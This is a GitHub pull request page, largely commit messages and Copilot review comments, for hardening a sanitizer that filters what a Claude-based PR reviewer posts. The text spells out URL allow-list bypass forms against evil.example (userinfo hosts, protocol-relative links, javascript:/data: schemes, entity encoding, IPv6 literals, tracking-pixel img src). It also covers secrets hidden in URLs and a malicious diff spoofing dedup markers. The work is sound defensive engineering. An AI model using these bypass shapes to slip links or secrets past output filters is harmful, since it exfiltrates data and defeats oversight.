Closes a security bypass in the URL allow-list sanitizer, hardens the post/update dedup contract against marker spoofing, and addresses four new Copilot comments (one Layer-3 fail-open, three doc inconsistencies). URL allow-list bypass (sanitize_claude_actions.sh) -------------------------------------------------- Two ways the previous allow-list could be bypassed: 1. Userinfo authority: `https://github.com@evil.example/path` parsed as host=`github.com` by the old regex, but the actual host an HTTP client resolves is `evil.example` (RFC 3986 authority is `[userinfo@]host[:port]`). Passed the allow-list, hit a phishing site. 2. Markdown link destinations the bare-URL regex ignored: `[click](//evil.example/path)` (protocol-relative, inherits the viewer's scheme), and non-http(s) schemes like `mailto:`, `ftp:`, `javascript:`, `data:`, `file:`, `vbscript:`. Fixes: - Layer 1 (bare URLs) now strips userinfo before host extraction and lowercases the host once at the top so casing variants (`HTTPS://Github.com/...`) don't slip past. - Layer 2 scans Markdown inline `[t](dest)` and reference-style `[t]: dest` destinations, rejecting protocol-relative destinations to disallowed hosts and any non-http(s) scheme. - In-repo paths (`mlir/lib/Foo.cpp`) and fragment anchors (`#x`) are untouched -- they have no scheme/authority and are safe. Marker-spoofing hardening (sanitizer + post script + skills) ------------------------------------------------------------ Dedup correctness depends on `` markers being unforgeable from model output. Two changes: - `sanitize_claude_actions.sh`: any `<!-- claude-pr-review-` literal in summary / inline / thread bodies fails the build (exit 1). Stops a malicious diff from injecting a marker that would later confuse `update-pr-review`'s "is this our reply?" check. - `post_claude_review.sh`: new `with_marker_and_action()` helper appends the dedup marker AND a sub-marker (`action:resolve` / `action:clarify`) on every reply we post. `update-pr-review`'s SKILL.md is updated to read intent from the sub-marker, not the body prefix -- so a human edit of the visible body can't flip a "resolve" reply into a "clarify" for dedup purposes. - meta.json bookkeeping in the skill is updated to match. Copilot review batch 4 (4 new comments) --------------------------------------- 1. Layer-3 perimeter guard fail-open (claude_auto_review.yml): The `git diff ... | grep ... || true` single pipeline meant a `git diff` failure (bad ref, missing origin/<default>, repo corruption) was silently masked by the trailing `|| true` -- even with pipefail, the explicit `|| true` swallows the pipeline exit and `perimeter_changes` ends up empty, passing the gate. Split into a separate `diff_output=\$(git diff ...)` statement so set -e aborts on diff failure, keeping `|| true` only on the grep where "no perimeter file matched" is the safe case. 2. claude_auto_review_perimeter_banner.yml header staleness: - Replaced the `gh pr edit --remove-label` mention with the actual `gh api --method DELETE .../labels/modifies-ci-paths` call (the Copilot batch 3 commit moved to the API form for selective 404 handling). - Replaced the stale "permissions: pull-requests: write + issues: write only" line with the current `permissions: {}` default-deny + rocMLIR-PR-Reviewer App installation token model. 3. update-pr-review/SKILL.md Step 3 rules vs the regression branch: The Copilot batch 3 commit added a Scenario D regression sub-case (previously-resolved thread sees the same finding return -> emit a `clarify` thread_update). The Step-3 rules still said "Scenario D emits no entry", contradicting the new logic. Updated both rules to call out the regression sub-case explicitly: thread_updates includes Scenario A/B/C plus Scenario D's regression sub-case; Scenario D's non-regression case still emits nothing; inline_comments never includes any of those. 4. review-rocmlir-pr/SKILL.md Rules section URL contract: Skill said "no URL in any output field", but the workflow prompt and sanitizer permit github.com / *.github.com / *.githubusercontent.com URLs. Aligned the skill's rule with the prompt + sanitizer (allow-list, plus explicit bans on non-http(s) schemes, protocol-relative destinations, marker-prefix spoofing, userinfo-bypass forms) so the model and the sanitizer agree. Verification ------------ - All 3 workflow YAMLs parse via PyYAML. - All `run:` step bodies pass `bash -n`. - `sanitize_claude_actions.sh` and `post_claude_review.sh` pass `bash -n`. - Sanitizer fixture suite: 31/31 pass, covering original allow-list (11), case-fix + marker-spoofing (5), URL-bypass (13), and ref-style Markdown links (2). - Structural assertions verify all 4 new Copilot fixes are present. Co-authored-by: Cursor <cursoragent@cursor.com>

…anitizer Installed actionlint v1.7.7 + shellcheck v0.10.0 locally and ran them on the three Claude workflows and the standalone sanitizer/post scripts. Native actionlint was already clean; the integrated shellcheck pass and the standalone shellcheck pass surfaced 4 minor findings (one style, three info severity). Addressing them so the existing code stays green when actionlint is wired into CI. claude_auto_review.yml (Layer-3 perimeter step) ----------------------------------------------- SC2001 (style) on `echo "$perimeter_changes" | sed 's/^/ /'`: shellcheck suggests `${var//search/replace}`, but bash parameter expansion does literal-string substitution and cannot match the regex anchor `^`. The bash equivalent for "indent every line by 2 spaces" would be the awkward, error-prone `" ${perimeter_changes//$'\n'/$'\n' }"`. Added a targeted `# shellcheck disable=SC2001` directive with a justification explaining why sed is the right tool here -- this is a textbook SC2001 false positive (the warning is "style" severity precisely because shellcheck knows the substitution can't always be done). sanitize_claude_actions.sh -------------------------- SC1091 (info) on `source "$(dirname "$0")/secret_patterns.sh"`: The existing `# shellcheck source=secret_patterns.sh` directive was being resolved relative to CWD instead of next to the script when shellcheck was invoked with a relative file path (`-x .github/scripts/ sanitize_claude_actions.sh`). Added the `# shellcheck source-path= SCRIPTDIR` magic anchor (supported since shellcheck 0.7.0) so the `source=` lookup is always relative to the sourcing script's directory regardless of CWD. SC2018/SC2019 (info) on `tr 'A-Z' 'a-z'` at lines 338 and 381: Replaced both with the POSIX-class form `tr '[:upper:]' '[:lower:]'`. For ASCII URL hosts (which is what we lowercase here -- IDN/Unicode hostnames are punycoded before resolution) this is functionally equivalent, but the POSIX class form is the documented portable shellcheck-blessed spelling. Verification ------------ - `actionlint -shellcheck=shellcheck` on all 3 Claude workflows: exit 0. - `shellcheck -x` on `sanitize_claude_actions.sh` and `post_claude_review.sh`: exit 0. - Sanitizer fixture suite: still 31/31 pass after the `tr` change. Co-authored-by: Cursor <cursoragent@cursor.com>

Two Major findings against the previous URL allow-list and dedup hardening: raw HTML href/src attributes still rendered as live links and bypassed the bare-URL + Markdown allow-list, and the dedup logic was trusting marker presence over reply authorship -- letting a PR author spoof a "Claude reply" by pasting the marker into a thread. Sanitizer (sanitize_claude_actions.sh) -------------------------------------- HTML entity decoding pre-pass: GitHub's markdown renderer entity-decodes link destinations, href/src attribute values, and bare-URL auto-link targets before resolving them in the browser. So a model output of `https://evil.example/x`, `[click](//evil.example/x)`, or `<a href="//evil .example/x">click</a>` would render as a live link to evil.example yet sail past any literal-bytes pattern check. Added a pre-pass that HTML-entity-decodes all model-supplied strings via Python's `html.unescape` (handles named, decimal, and hex entities per WHATWG) into a `$strings_decoded_tmp` view; Layers 1, 2, and 3 all read from it. Decoding only ADDS matches (a bypass-encoded URL becomes a plain URL after decode), never removes them, so this is a strict strengthening. The marker-prefix anti-spoof check still runs against the raw bytes because the comment `body` GitHub stores -- and that update-pr-review later string-matches against -- is the raw bytes too; an entity-encoded marker never reaches update-pr-review's matcher in decoded form. Layer 3: HTML attribute scan (href= / src=): GitHub renders a sanitized subset of raw HTML inside markdown comments, notably `<a href="...">` and `<img src="...">`. That gave the model output four bypass shapes that Layers 1 and 2 missed: - `<a href="//evil.example/x">click</a>` (proto-relative href) - `<a href="https://evil.example/x">click</a>` (bare http(s) href -- Layer 1 already caught the substring after the entity-decode pre-pass; Layer 3 makes the rejection attribute-aware so the error message points at the real shape) - `<a href="mailto:test@example.com">click</a>` (and ftp://, file://; javascript:/data: are mostly stripped by GH's renderer but the pipeline has zero use for any of them) - `<img src="//evil.example/track.png">` (tracking pixel / exfil) Layer 3 extracts the destination of every href= and src= attribute (double-quoted, single-quoted, or unquoted; case-insensitive HREF/SRC matched too) and runs the Layer-2 scheme/host checks against them. Only href and src are scanned -- other URL-bearing HTML attributes (action, formaction, srcset, xlink:href) are not in GitHub's HTML allow-list for comments so they are stripped before render. Workflow prompt + review-rocmlir-pr/SKILL.md -------------------------------------------- Extended the prompt's Hard constraints block and the review skill's Rules section to spell out the new HTML attribute and entity-encoding rejections so the model is told the same contract the sanitizer enforces. update-pr-review/SKILL.md (Major: marker-spoof) ----------------------------------------------- Previously the skill defined "Claude reply" purely as "any reply whose body contains the marker", with explicit rationale for excluding the author check. That made PR-author replies a trust source: a PR author could paste   into a reply, and update-pr-review would classify it as one of OUR previous resolve replies. The Step-2 dedup gate would then conclude we already resolved this thread on a previous run with no human activity since, and silently drop a real regression flagged by the next review run. The marker-only check also misclassified the fake reply for the Scenario D regression branch. Now the "Claude (marker-tagged) replies" definition requires BOTH `user.login == "rocmlir-pr-reviewer[bot]"` AND the marker. The author check is the trust boundary; the marker remains required so we can still tell OUR resolve/clarify replies apart from a hypothetical genuine bot reply via a future workflow that someday installs the same App identity but does not write our marker. "Human replies" is now defined as "any reply that is NOT a Claude reply", which by construction includes spoofed-marker replies from non-bot authors -- those flow through the regular human-replies path where they are explicitly allowed to nudge the dedup gate. Verification ------------ - `actionlint -shellcheck=…` on all 3 workflows: exit 0. - `shellcheck -x` on `sanitize_claude_actions.sh` and `post_claude_review.sh`: exit 0. - Sanitizer fixture suite: 43/43 pass: - 16 regression cases (URL allow-list, marker spoof, Markdown bypass, case-insensitive scheme, in-repo paths, fragment anchors). - 14 NEW href= cases (proto-rel evil, bare https evil, mailto, javascript, ftp, data, file, single-quoted, unquoted, spaces around `=`, uppercase HREF, github.com pass, proto-rel github pass, fragment pass). - 4 NEW img src= cases (proto-rel evil, https evil, data: uri, githubusercontent.com pass). - 7 NEW entity-encoding cases (bare URL, Markdown destination, href proto-rel, href mailto, lt/gt-encoded full <a> tag, decimal entities, github.com decoded pass). - 2 NEW nested-field cases (href in inline body, href in clarify body) confirming all extraction layers see deeply nested fields. Co-authored-by: Cursor <cursoragent@cursor.com>

Major (Layer-1 bypass): bare `https://[::1]/x`, Markdown `[click](https://[::1]/x)`, and HTML `<a href="https://[::1]/x">` all passed the URL allow-list. Same shape with any IPv6 / IPvFuture / IPv4-mapped literal in the bracketed-host position bypassed every existing check. Why every existing layer missed it ---------------------------------- - Layer 1 (bare URL host check): the grep pattern is `https?://[A-Za-z0-9._~:@/-]+`, and `[` is NOT in that character class. The `+` quantifier requires at least one match after `://`, the next byte is `[`, grep simply doesn't match. Layer 1 never even sees the URL. - Layer 2a / 3a (non-http(s) scheme in Markdown / HTML attr): doesn't fire because the scheme IS `https:` (or absent for proto-relative). - Layer 2b / 3b (protocol-relative): the `^//[^/?#]+` extraction does catch `[click](//[::1]/x)` and `<a href="//[::1]/x">` (the bracketed authority lands in the host check and fails the allow-list), but `https://[::1]/x` has an explicit scheme so this rule doesn't apply -- and an attacker would just use that form. Layer 4: bracketed-IP-literal hosts (categorical rejection) ----------------------------------------------------------- RFC 3986 §3.2.2 defines the host component as either reg-name or IP-literal (`"[" ( IPv6address / IPvFuture ) "]"`). Bracketed authorities are now categorically rejected -- no host-allow-list classification is possible (you can't tell from `[2606:50c0:8000::153]` whether it points at GitHub Pages or an attacker's host that happens to have pinned the same address) and there's no legitimate use case in a code-review body anyway: github.com / gist.github.com / etc. are never reached via raw IP literal. Single regex `(https?:)?//\[[^]]+\]` covers every bypass shape in one content-agnostic pass: - bare URL : https://[::1]/x - Markdown dest : [click](https://[::1]/x), [click](//[::1]/x) - HTML href / src : <a href="https://[::1]/x">, <a href="//[::1]/x">, <img src="//[fe80::1]/track.png"> - IPvFuture : https://[v1.fe80::a+en1]/x - IPv4-mapped IPv6 : https://[::ffff:1.2.3.4]/x - entity-encoded : https://[::1]/x (entity-decoded before this layer runs) The `//` immediately preceding `[` is the discriminator: a bracketed segment in a URL PATH (e.g. `https://github.com/foo/[::1]/bar`) does NOT match because the bracket is not in authority position. Verified. Prompt + review-rocmlir-pr/SKILL.md ----------------------------------- Both updated to call out the bracketed-IP-literal rejection in the same "Hard constraints" / "Rules" rejection list as the other URL shapes, so the model is told the same contract the sanitizer enforces. Verification ------------ - `actionlint -shellcheck=…` on all 3 workflows: exit 0. - `shellcheck -x` on `sanitize_claude_actions.sh` and `post_claude_review.sh`: exit 0. - Sanitizer fixture suite: 43/43 pass: - 20 NEW bracketed-host cases (bare URL, Markdown inline + ref-style, HTML href in 4 quoting forms, HTML img src, IPv6 loopback / link- local / GUA / port / uppercase scheme, IPvFuture, IPv4-mapped, entity-encoded brackets in hex and decimal, deep-nested in inline + clarify bodies). - 5 NEW negative cases (github.com normal, githubusercontent normal, brackets in URL PATH not host, prose `[::1]` mention, bare literal `[::1]`) to confirm no false positives. - 18 regression cases (URL allow-list, marker spoof, Markdown bypass, HTML href bypass, entity encoding, scheme case, in-repo paths, fragment anchors). Co-authored-by: Cursor <cursoragent@cursor.com>

Copilot

Pull request overview

Copilot reviewed 9 out of 10 changed files in this pull request and generated 7 comments.

Comments suppressed due to low confidence (5)

.github/scripts/sanitize_claude_actions.sh:465

Protocol-relative Markdown destinations are logged verbatim after extracting the host. Since the host itself can contain encoded sensitive data, this can turn a blocked URL-shaped exfiltration attempt into a log leak. Redact the reported host instead of printing model-supplied URL components directly.

if [[ -n "$bad_proto_rel" ]]; then
  echo "::error::actions.json contains protocol-relative Markdown link destinations to disallowed hosts:"
  printf '%s\n' "$bad_proto_rel" | head -10 | sed 's/^/  - /'
  echo "::error::Protocol-relative destinations (//host/...) resolve to the page's protocol; on a github.com page, //evil.example/x becomes https://evil.example/x. Only //github.com/... (and *.github.com / *.githubusercontent.com) is allowed."

.github/scripts/sanitize_claude_actions.sh:533

This protocol-relative href=/src= error path logs model-supplied hosts directly. Hosts can contain encoded secret material, so the sanitizer can still leak data to Actions logs while rejecting the payload. Redact or truncate the reported host values.

if [[ -n "$attr_bad_proto_rel" ]]; then
  echo "::error::actions.json contains protocol-relative href= or src= attributes to disallowed hosts:"
  printf '%s\n' "$attr_bad_proto_rel" | head -10 | sed 's/^/  - /'
  echo "::error::Protocol-relative href/src (//host/...) resolves to the page's protocol; on a github.com page, //evil.example/x becomes https://evil.example/x. Only //github.com/... (and *.github.com / *.githubusercontent.com) is allowed."

.github/scripts/sanitize_claude_actions.sh:391

The URL check strips userinfo before applying the host allow-list, but it does not reject URLs that contain userinfo. As a result, https://<secret>@github.com/... passes because the remaining host is allow-listed, and the secret-bearing URL would be posted in the PR comment. Treat any authority containing userinfo (@ before the host) as invalid instead of only stripping it for host comparison.

disallowed_hosts=$(grep -oiE 'https?://[A-Za-z0-9._~:@/-]+' "$strings_decoded_tmp" \
  | tr '[:upper:]' '[:lower:]' \
  | sed -E 's|^https?://([^/?#]+).*|\1|' \
  | sed -E 's|.*@||' \
  | sed -E 's|:[0-9]+$||' \

.github/scripts/sanitize_claude_actions.sh:460

Protocol-relative Markdown destinations also strip userinfo before allow-listing, so //<secret>@github.com/path is accepted as a GitHub URL even though the posted destination contains the secret-bearing userinfo. Reject destinations whose authority contains @ rather than only stripping that prefix for host comparison.

bad_proto_rel=$(printf '%s\n' "$md_dests" \
  | grep -oE '^//[^/?#]+' \
  | sed -E 's|^//||' \
  | sed -E 's|.*@||' \
  | sed -E 's|:[0-9]+$||' \
  | sort -u \
  | grep -vE "$ALLOWED_HOST_RE" \

.github/scripts/sanitize_claude_actions.sh:528

The protocol-relative href=/src= check accepts //<secret>@github.com/... because it strips userinfo before checking the host. Since the original attribute value is what would be posted/rendered, this allows secret material in userinfo to bypass the sanitizer. Reject userinfo-bearing attribute destinations outright.

attr_bad_proto_rel=$(printf '%s\n' "$attr_dests" \
  | grep -oE '^//[^/?#]+' \
  | sed -E 's|^//||' \
  | sed -E 's|.*@||' \
  | sed -E 's|:[0-9]+$||' \
  | sort -u \
  | grep -vE "$ALLOWED_HOST_RE" \

+disallowed_hosts=$(grep -oiE 'https?://[A-Za-z0-9._~:@/-]+' "$strings_decoded_tmp" \
+  | tr '[:upper:]' '[:lower:]' \
+  | sed -E 's|^https?://([^/?#]+).*|\1|' \
+  | sed -E 's|.*@||' \
+  | sed -E 's|:[0-9]+$||' \
+  | sort -u \
+  | grep -vE "$ALLOWED_HOST_RE" \


+if [[ -n "$disallowed_hosts" ]]; then
+  echo "::error::actions.json contains URLs to disallowed hosts:"
+  printf '%s\n' "$disallowed_hosts" | head -10 | sed 's/^/  - /'
+  echo "::error::Only github.com (and *.github.com / *.githubusercontent.com) URLs are allowed in review bodies. See the URL allow-list in sanitize_claude_actions.sh and the matching contract in the prompt's Hard constraints block in .github/workflows/claude_auto_review.yml."


+if [[ -n "$bad_scheme" ]]; then
+  echo "::error::actions.json contains Markdown link destinations with non-http(s) schemes:"
+  printf '%s\n' "$bad_scheme" | head -10 | sed 's/^/  - /'
+  echo "::error::Only http(s)://github.com URLs (allow-listed by Layer 1), in-repo paths, and fragment anchors are valid link destinations. mailto:, ftp:, javascript:, data:, file:, vbscript: etc. are rejected."


+if [[ -n "$attr_bad_scheme" ]]; then
+  echo "::error::actions.json contains href= or src= attributes with non-http(s) schemes:"
+  printf '%s\n' "$attr_bad_scheme" | head -10 | sed 's/^/  - /'
+  echo "::error::Only http(s)://github.com (and *.github.com / *.githubusercontent.com) URLs are valid href/src destinations. mailto:, ftp:, javascript:, data:, file:, vbscript: etc. are rejected."


+# Secret/credential pattern scan over every string in the document. Patterns are
+# defined in secret_patterns.sh.
+hits=$(jq -r '[.. | strings] | .[]' "$ACTIONS_FILE" \


+
+## Step 3 -- Output schema
+
+Return a single JSON object with two arrays AS YOUR FINAL RESPONSE. The workflow uses


+      #   - conditional thread-update field requirements (e.g. resolve_with_reaction
+      #     needs human_reply_id, clarify needs body)
+      #   - secret/credential pattern scan over every string
+      #   - LLM-Gateway env-var-name scan
+      #
+      # Runs from the workspace path; Claude has no Write, so the overlaid script
+      # cannot have been tampered with mid-job.
+      - name: Sanitize actions.json
+        id: sanitize
+        # Pass ANTHROPIC_BASE_URL into the sanitizer step so it can
+        # scan for the LITERAL URL value (not just the env var name)


umangyadav added the claude-review Trigger automated PR review by claude[bot]; auto-removed after the run. label May 15, 2026

umangyadav and others added 5 commits May 15, 2026 15:49

Merge branch 'develop' into wf/claude-pr-review

40f9c66

umangyadav requested a review from Copilot May 15, 2026 16:46

Copilot started reviewing on behalf of umangyadav May 15, 2026 16:48 View session

Copilot AI reviewed May 15, 2026

View reviewed changes

umangyadav and others added 4 commits May 15, 2026 17:03

umangyadav requested a review from Copilot May 15, 2026 18:23

umangyadav marked this pull request as ready for review May 15, 2026 18:23

umangyadav requested a review from causten as a code owner May 15, 2026 18:23

Copilot started reviewing on behalf of umangyadav May 15, 2026 18:25 View session

causten approved these changes May 15, 2026

View reviewed changes

umangyadav requested a review from justinrosner May 15, 2026 18:28

dorde-antic approved these changes May 15, 2026

View reviewed changes

Copilot AI reviewed May 15, 2026

View reviewed changes

umangyadav and others added 8 commits May 15, 2026 18:31

umangyadav and others added 4 commits May 15, 2026 19:52

umangyadav requested a review from Copilot May 15, 2026 20:24

Copilot started reviewing on behalf of umangyadav May 15, 2026 20:27 View session

Copilot AI reviewed May 15, 2026

View reviewed changes

umangyadav and others added 5 commits May 15, 2026 21:01

umangyadav requested a review from Copilot May 15, 2026 23:03

Copilot started reviewing on behalf of umangyadav May 15, 2026 23:05 View session

Copilot AI reviewed May 15, 2026

View reviewed changes


		## Step 3 -- Output schema

		Return a single JSON object with two arrays AS YOUR FINAL RESPONSE. The workflow uses

Conversation

umangyadav commented May 15, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Architecture

Three workflows

Bot identity (rocMLIR-PR-Reviewer GitHub App)

Why pull_request and NOT pull_request_target?

Files

Required repo configuration

Operational notes

Motivation

Technical Details

Test Plan

Test Result

Submission Checklist

Uh oh!

Copilot AI left a comment

Choose a reason for hiding this comment

Pull request overview

Reviewed changes

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Copilot AI left a comment

Choose a reason for hiding this comment

Pull request overview

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Copilot AI left a comment

Choose a reason for hiding this comment

Pull request overview

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Copilot AI left a comment

Choose a reason for hiding this comment

Pull request overview

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

4 participants

umangyadav commented May 15, 2026 •

edited

Loading

Why `pull_request` and NOT `pull_request_target`?